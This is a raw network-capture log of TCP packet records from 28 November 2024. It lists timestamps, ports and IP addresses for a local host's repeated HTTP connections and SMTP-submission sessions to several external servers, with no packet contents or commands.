Nov 28, 2024 06:44:04.446171999 CET	49926	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:44:04.569751978 CET	80	49926	13.251.16.150	192.168.2.4
Nov 28, 2024 06:44:04.569999933 CET	80	49926	13.251.16.150	192.168.2.4
Nov 28, 2024 06:44:07.076860905 CET	80	49926	13.251.16.150	192.168.2.4
Nov 28, 2024 06:44:07.076925993 CET	80	49926	13.251.16.150	192.168.2.4
Nov 28, 2024 06:44:07.076972008 CET	49926	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:44:07.089359999 CET	49926	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:44:07.213062048 CET	80	49926	13.251.16.150	192.168.2.4
Nov 28, 2024 06:44:07.620359898 CET	49927	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:44:07.744136095 CET	80	49927	18.246.231.120	192.168.2.4
Nov 28, 2024 06:44:07.746526003 CET	49927	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:44:07.751003981 CET	49927	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:44:07.751022100 CET	49927	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:44:07.874738932 CET	80	49927	18.246.231.120	192.168.2.4
Nov 28, 2024 06:44:07.874759912 CET	80	49927	18.246.231.120	192.168.2.4
Nov 28, 2024 06:44:09.246356964 CET	80	49927	18.246.231.120	192.168.2.4
Nov 28, 2024 06:44:09.246448994 CET	80	49927	18.246.231.120	192.168.2.4
Nov 28, 2024 06:44:09.246495962 CET	49927	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:44:09.248220921 CET	49927	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:44:09.371968985 CET	80	49927	18.246.231.120	192.168.2.4
Nov 28, 2024 06:44:09.748631954 CET	49928	80	192.168.2.4	47.129.31.212
Nov 28, 2024 06:44:09.872436047 CET	80	49928	47.129.31.212	192.168.2.4
Nov 28, 2024 06:44:09.872505903 CET	49928	80	192.168.2.4	47.129.31.212
Nov 28, 2024 06:44:09.872772932 CET	49928	80	192.168.2.4	47.129.31.212
Nov 28, 2024 06:44:09.872843981 CET	49928	80	192.168.2.4	47.129.31.212
Nov 28, 2024 06:44:09.996551037 CET	80	49928	47.129.31.212	192.168.2.4
Nov 28, 2024 06:44:09.996582031 CET	80	49928	47.129.31.212	192.168.2.4
Nov 28, 2024 06:44:11.937894106 CET	80	49928	47.129.31.212	192.168.2.4
Nov 28, 2024 06:44:11.937987089 CET	80	49928	47.129.31.212	192.168.2.4
Nov 28, 2024 06:44:11.938052893 CET	49928	80	192.168.2.4	47.129.31.212
Nov 28, 2024 06:44:11.939085007 CET	49928	80	192.168.2.4	47.129.31.212
Nov 28, 2024 06:44:12.062766075 CET	80	49928	47.129.31.212	192.168.2.4
Nov 28, 2024 06:44:12.412024975 CET	49929	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:44:12.535752058 CET	80	49929	13.251.16.150	192.168.2.4
Nov 28, 2024 06:44:12.537019014 CET	49929	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:44:12.537178040 CET	49929	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:44:12.537201881 CET	49929	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:44:12.660892010 CET	80	49929	13.251.16.150	192.168.2.4
Nov 28, 2024 06:44:12.660903931 CET	80	49929	13.251.16.150	192.168.2.4
Nov 28, 2024 06:44:12.914185047 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:13.038000107 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:13.328828096 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:13.356610060 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:13.360013962 CET	49930	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:13.483758926 CET	587	49930	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:13.484858990 CET	49930	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:14.596645117 CET	80	49929	13.251.16.150	192.168.2.4
Nov 28, 2024 06:44:14.596791029 CET	80	49929	13.251.16.150	192.168.2.4
Nov 28, 2024 06:44:14.596833944 CET	49929	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:44:14.596936941 CET	49929	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:44:14.720985889 CET	80	49929	13.251.16.150	192.168.2.4
Nov 28, 2024 06:44:14.773083925 CET	587	49930	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:14.773258924 CET	49930	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:14.897305965 CET	587	49930	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:15.086745024 CET	49931	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:44:15.185344934 CET	587	49930	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:15.185548067 CET	49930	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:15.210495949 CET	80	49931	18.246.231.120	192.168.2.4
Nov 28, 2024 06:44:15.210678101 CET	49931	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:44:15.211124897 CET	49931	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:44:15.212991953 CET	49931	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:44:15.309283972 CET	587	49930	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:15.335007906 CET	80	49931	18.246.231.120	192.168.2.4
Nov 28, 2024 06:44:15.337152958 CET	80	49931	18.246.231.120	192.168.2.4
Nov 28, 2024 06:44:15.598090887 CET	587	49930	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:15.601883888 CET	49930	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:15.725804090 CET	587	49930	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:16.541138887 CET	587	49930	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:16.541169882 CET	587	49930	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:16.541183949 CET	587	49930	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:16.541239977 CET	49930	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:16.554649115 CET	49930	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:16.660119057 CET	80	49931	18.246.231.120	192.168.2.4
Nov 28, 2024 06:44:16.660327911 CET	49931	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:44:16.660358906 CET	80	49931	18.246.231.120	192.168.2.4
Nov 28, 2024 06:44:16.660403013 CET	49931	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:44:16.730640888 CET	587	49930	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:16.784054041 CET	80	49931	18.246.231.120	192.168.2.4
Nov 28, 2024 06:44:16.981395960 CET	587	49930	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:16.984019041 CET	49930	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:17.107919931 CET	587	49930	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:17.143333912 CET	49932	80	192.168.2.4	3.94.10.34
Nov 28, 2024 06:44:17.267122030 CET	80	49932	3.94.10.34	192.168.2.4
Nov 28, 2024 06:44:17.267200947 CET	49932	80	192.168.2.4	3.94.10.34
Nov 28, 2024 06:44:17.267455101 CET	49932	80	192.168.2.4	3.94.10.34
Nov 28, 2024 06:44:17.267551899 CET	49932	80	192.168.2.4	3.94.10.34
Nov 28, 2024 06:44:17.391124964 CET	80	49932	3.94.10.34	192.168.2.4
Nov 28, 2024 06:44:17.391196966 CET	80	49932	3.94.10.34	192.168.2.4
Nov 28, 2024 06:44:17.396239996 CET	587	49930	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:17.396481991 CET	49930	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:17.520395994 CET	587	49930	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:17.809026003 CET	587	49930	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:17.809444904 CET	49930	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:17.933255911 CET	587	49930	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:18.461925030 CET	80	49932	3.94.10.34	192.168.2.4
Nov 28, 2024 06:44:18.461968899 CET	80	49932	3.94.10.34	192.168.2.4
Nov 28, 2024 06:44:18.462059021 CET	49932	80	192.168.2.4	3.94.10.34
Nov 28, 2024 06:44:18.462228060 CET	49932	80	192.168.2.4	3.94.10.34
Nov 28, 2024 06:44:18.514292002 CET	49930	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:18.576948881 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:18.585874081 CET	80	49932	3.94.10.34	192.168.2.4
Nov 28, 2024 06:44:18.638386965 CET	587	49930	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:18.638432980 CET	49930	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:18.709547043 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:18.709616899 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:19.041068077 CET	49934	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:44:19.165153027 CET	80	49934	18.246.231.120	192.168.2.4
Nov 28, 2024 06:44:19.169080019 CET	49934	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:44:19.186909914 CET	49934	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:44:19.187066078 CET	49934	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:44:19.310722113 CET	80	49934	18.246.231.120	192.168.2.4
Nov 28, 2024 06:44:19.310765028 CET	80	49934	18.246.231.120	192.168.2.4
Nov 28, 2024 06:44:20.018310070 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:20.021085024 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:20.144954920 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:20.442821026 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:20.442954063 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:20.566814899 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:20.616663933 CET	80	49934	18.246.231.120	192.168.2.4
Nov 28, 2024 06:44:20.616724968 CET	80	49934	18.246.231.120	192.168.2.4
Nov 28, 2024 06:44:20.616780043 CET	49934	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:44:20.616908073 CET	49934	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:44:20.740537882 CET	80	49934	18.246.231.120	192.168.2.4
Nov 28, 2024 06:44:20.864504099 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:20.864960909 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:20.988671064 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:21.107053995 CET	49935	80	192.168.2.4	3.254.94.185
Nov 28, 2024 06:44:21.230843067 CET	80	49935	3.254.94.185	192.168.2.4
Nov 28, 2024 06:44:21.231065989 CET	49935	80	192.168.2.4	3.254.94.185
Nov 28, 2024 06:44:21.231332064 CET	49935	80	192.168.2.4	3.254.94.185
Nov 28, 2024 06:44:21.231441975 CET	49935	80	192.168.2.4	3.254.94.185
Nov 28, 2024 06:44:21.291977882 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:21.291995049 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:21.292006969 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:21.292057037 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:21.294982910 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:21.355050087 CET	80	49935	3.254.94.185	192.168.2.4
Nov 28, 2024 06:44:21.355185986 CET	80	49935	3.254.94.185	192.168.2.4
Nov 28, 2024 06:44:21.418652058 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:21.716408014 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:21.720988989 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:21.844804049 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:22.142282963 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:22.148529053 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:22.272341967 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:22.569936037 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:22.570240974 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:22.693928957 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:22.735393047 CET	80	49935	3.254.94.185	192.168.2.4
Nov 28, 2024 06:44:22.735486031 CET	80	49935	3.254.94.185	192.168.2.4
Nov 28, 2024 06:44:22.735543013 CET	49935	80	192.168.2.4	3.254.94.185
Nov 28, 2024 06:44:22.735687017 CET	49935	80	192.168.2.4	3.254.94.185
Nov 28, 2024 06:44:22.860241890 CET	80	49935	3.254.94.185	192.168.2.4
Nov 28, 2024 06:44:22.893604994 CET	49936	80	192.168.2.4	85.214.228.140
Nov 28, 2024 06:44:22.994141102 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:22.994368076 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:23.017297029 CET	80	49936	85.214.228.140	192.168.2.4
Nov 28, 2024 06:44:23.017363071 CET	49936	80	192.168.2.4	85.214.228.140
Nov 28, 2024 06:44:23.017647028 CET	49936	80	192.168.2.4	85.214.228.140
Nov 28, 2024 06:44:23.017728090 CET	49936	80	192.168.2.4	85.214.228.140
Nov 28, 2024 06:44:23.117974997 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:23.141287088 CET	80	49936	85.214.228.140	192.168.2.4
Nov 28, 2024 06:44:23.141376019 CET	80	49936	85.214.228.140	192.168.2.4
Nov 28, 2024 06:44:23.415361881 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:23.415584087 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:23.540210009 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:23.840274096 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:23.841249943 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:23.964922905 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.262514114 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.262876034 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:24.262954950 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:24.262983084 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:24.263067007 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:24.264530897 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:24.378396034 CET	80	49936	85.214.228.140	192.168.2.4
Nov 28, 2024 06:44:24.383404016 CET	49936	80	192.168.2.4	85.214.228.140
Nov 28, 2024 06:44:24.383635044 CET	49936	80	192.168.2.4	85.214.228.140
Nov 28, 2024 06:44:24.386595011 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.386641026 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:24.386648893 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.386657953 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.386778116 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.386821032 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:24.388344049 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.388353109 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.388389111 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:24.388403893 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.388407946 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:24.388420105 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.388448954 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:24.388461113 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:24.388524055 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.388571024 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:24.388575077 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.388618946 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:24.388633013 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.388648033 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.388675928 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:24.388695002 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.388708115 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:24.388745070 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:24.507211924 CET	80	49936	85.214.228.140	192.168.2.4
Nov 28, 2024 06:44:24.507422924 CET	80	49936	85.214.228.140	192.168.2.4
Nov 28, 2024 06:44:24.510324955 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.510395050 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:24.510514021 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.510559082 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:24.512048960 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.512094975 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:24.512191057 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.512242079 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:24.512243032 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.512289047 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:24.512310028 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.512341976 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.512361050 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:24.512393951 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:24.512433052 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.512480974 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:24.512522936 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.512577057 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:24.512655973 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.512703896 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.512703896 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:24.512748957 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:24.559977055 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.560045958 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:24.634208918 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.634270906 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:24.634290934 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.634335995 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:24.635803938 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.636012077 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.636019945 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.636099100 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.636188984 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.636214018 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.636475086 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.636487007 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.636496067 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.636504889 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.636513948 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.636667013 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.636676073 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.636683941 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.636693954 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.636702061 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.636718988 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.636728048 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.636735916 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.636745930 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.636953115 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.636962891 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.636970997 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.636980057 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.683901072 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.684019089 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.758162975 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.758177996 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.758188009 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.758249998 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.758301020 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:24.810265064 CET	80	49936	85.214.228.140	192.168.2.4
Nov 28, 2024 06:44:24.949115038 CET	49936	80	192.168.2.4	85.214.228.140
Nov 28, 2024 06:44:25.187140942 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:25.232428074 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:25.306982994 CET	49937	80	192.168.2.4	47.129.31.212
Nov 28, 2024 06:44:25.430757999 CET	80	49937	47.129.31.212	192.168.2.4
Nov 28, 2024 06:44:25.430876017 CET	49937	80	192.168.2.4	47.129.31.212
Nov 28, 2024 06:44:25.431083918 CET	49937	80	192.168.2.4	47.129.31.212
Nov 28, 2024 06:44:25.431083918 CET	49937	80	192.168.2.4	47.129.31.212
Nov 28, 2024 06:44:25.554980993 CET	80	49937	47.129.31.212	192.168.2.4
Nov 28, 2024 06:44:25.554992914 CET	80	49937	47.129.31.212	192.168.2.4
Nov 28, 2024 06:44:27.498636961 CET	80	49937	47.129.31.212	192.168.2.4
Nov 28, 2024 06:44:27.498702049 CET	80	49937	47.129.31.212	192.168.2.4
Nov 28, 2024 06:44:27.498899937 CET	49937	80	192.168.2.4	47.129.31.212
Nov 28, 2024 06:44:27.498899937 CET	49937	80	192.168.2.4	47.129.31.212
Nov 28, 2024 06:44:27.622684002 CET	80	49937	47.129.31.212	192.168.2.4
Nov 28, 2024 06:44:27.990986109 CET	49938	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:44:28.114774942 CET	80	49938	18.246.231.120	192.168.2.4
Nov 28, 2024 06:44:28.114845991 CET	49938	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:44:28.114975929 CET	49938	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:44:28.114999056 CET	49938	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:44:28.238637924 CET	80	49938	18.246.231.120	192.168.2.4
Nov 28, 2024 06:44:28.238656998 CET	80	49938	18.246.231.120	192.168.2.4
Nov 28, 2024 06:44:29.608851910 CET	80	49938	18.246.231.120	192.168.2.4
Nov 28, 2024 06:44:29.609119892 CET	80	49938	18.246.231.120	192.168.2.4
Nov 28, 2024 06:44:29.609230042 CET	49938	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:44:29.609327078 CET	49938	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:44:29.733047009 CET	80	49938	18.246.231.120	192.168.2.4
Nov 28, 2024 06:44:29.774183035 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:29.898008108 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:30.107409000 CET	49939	80	192.168.2.4	47.129.31.212
Nov 28, 2024 06:44:30.195584059 CET	587	49933	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:30.195924997 CET	49933	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:30.196660995 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:30.231190920 CET	80	49939	47.129.31.212	192.168.2.4
Nov 28, 2024 06:44:30.231250048 CET	49939	80	192.168.2.4	47.129.31.212
Nov 28, 2024 06:44:30.231471062 CET	49939	80	192.168.2.4	47.129.31.212
Nov 28, 2024 06:44:30.231487989 CET	49939	80	192.168.2.4	47.129.31.212
Nov 28, 2024 06:44:30.320379972 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:30.320451021 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:30.355176926 CET	80	49939	47.129.31.212	192.168.2.4
Nov 28, 2024 06:44:30.355212927 CET	80	49939	47.129.31.212	192.168.2.4
Nov 28, 2024 06:44:31.581063032 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:31.589015007 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:31.712754011 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:32.002568960 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:32.003271103 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:32.126972914 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:32.293560982 CET	80	49939	47.129.31.212	192.168.2.4
Nov 28, 2024 06:44:32.293701887 CET	80	49939	47.129.31.212	192.168.2.4
Nov 28, 2024 06:44:32.293745995 CET	49939	80	192.168.2.4	47.129.31.212
Nov 28, 2024 06:44:32.293790102 CET	49939	80	192.168.2.4	47.129.31.212
Nov 28, 2024 06:44:32.417274952 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:32.417421103 CET	80	49939	47.129.31.212	192.168.2.4
Nov 28, 2024 06:44:32.417711973 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:32.541448116 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:32.767971992 CET	49941	80	192.168.2.4	18.208.156.248
Nov 28, 2024 06:44:32.837081909 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:32.837095022 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:32.837105036 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:32.837152958 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:32.838406086 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:32.891652107 CET	80	49941	18.208.156.248	192.168.2.4
Nov 28, 2024 06:44:32.891731024 CET	49941	80	192.168.2.4	18.208.156.248
Nov 28, 2024 06:44:32.891911983 CET	49941	80	192.168.2.4	18.208.156.248
Nov 28, 2024 06:44:32.891931057 CET	49941	80	192.168.2.4	18.208.156.248
Nov 28, 2024 06:44:32.962075949 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:33.015659094 CET	80	49941	18.208.156.248	192.168.2.4
Nov 28, 2024 06:44:33.015669107 CET	80	49941	18.208.156.248	192.168.2.4
Nov 28, 2024 06:44:33.252293110 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:33.254839897 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:33.380038023 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:33.669797897 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:33.670427084 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:33.794280052 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:34.042906046 CET	80	49941	18.208.156.248	192.168.2.4
Nov 28, 2024 06:44:34.042952061 CET	80	49941	18.208.156.248	192.168.2.4
